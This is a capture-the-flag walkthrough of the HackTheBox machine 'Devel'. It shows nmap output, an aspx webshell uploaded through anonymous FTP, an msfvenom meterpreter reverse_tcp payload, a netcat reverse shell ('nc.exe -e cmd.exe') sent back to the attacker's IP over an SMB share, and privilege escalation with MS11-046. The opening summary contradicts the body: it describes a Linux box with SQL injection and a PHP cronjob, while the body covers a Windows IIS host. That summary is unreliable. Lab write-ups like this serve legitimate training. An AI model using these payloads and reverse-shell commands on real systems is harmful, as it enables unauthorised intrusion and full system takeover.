Summary

Devel is an easy Linux box that can be exploited by properly enumerating all ports and services. You will find that there are multiple domains by enumerating DNS. The admin login page is vulnerable to SQL Injection after which you can execute command injection to obtain a low level shell. Privileges can be escalated by exploiting a php cronjob.

Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.28.223

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM                aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

After navigating to the server, I found that the user is presented with an image that shows Microsoft IIS 7 is used. I also instantly went to investigate FTP as anonymous login is allowed. ftp devel.htb shows the following files:

ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM      		           aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png

Exploitation

Method One (Meterpreter)

This is the easiest method using Meterpreter and Msfvenom. From FTP enumeration it was pretty obvious that you can upload files and open these through your browser. The aspnet_client and from investigating the response headers on the browser it is required to upload an aspx shell. I used this one. Uploaded this with PUT command in FTP. When navigating to http://devel.htb/shell.aspx the user is presented with the webshell as shown below:

I navigated through the filesystem a bit and attempted to get a reverse shell with netcat but realised that you could simply upload a reverse shell with FTP. I generated an aspx shell with msfvenom: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.23 LPORT=4455 -f aspx > meterpreter.aspx Uploaded this with FTP:

ftp> binary
200 Type set to I.
ftp> put meterpreter.aspx
local: meterpreter.aspx remote: meterpreter.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2843 bytes sent in 0.00 secs (31.1643 MB/s)

With FTP its important to always set Binary mode when transferring such files. After this you can setup a listener in and navigate to: http://devel.htb/meterpreter.aspx. This gives a meterpreter shell:

meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter > sysinfo 
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows

Exploitation Method Two (SMB)

The second exploitation method is by moving files and forth with SMB. This script was used to setup smbserver on linux. The script requires you to run as root or with sudo privileges as shown below:

sudo smbserver share smb
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

After this a netcat listener was setup on port 4455. Finally, from the webshell that was uploaded before you can issue the following command:

\\10.10.14.23\share\nc.exe -e cmd.exe 10.10.14.23 4455

This will open a netcat shell:

sudo nc -lnvp 4455
listening on [any] 4455 ...
connect to [10.10.14.23] from (UNKNOWN) [10.129.34.0] 49161
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600

Privilege Escalation

I recommend running several automated enumeration scripts. In this case, I ran both, Jaws and WinPrivCheck.bat. The latter found the following potential privesc method:

This exploit can be compiled and transferred to the target. After executing:

c:\Windows\Temp>MS11-046.exe
MS11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system

Conclusion

This was quite an easy box. The FTP shell made it very easy to exploit and from reading other walkthroughs there were several other privesc methods. Hope you enjoyed this writeup!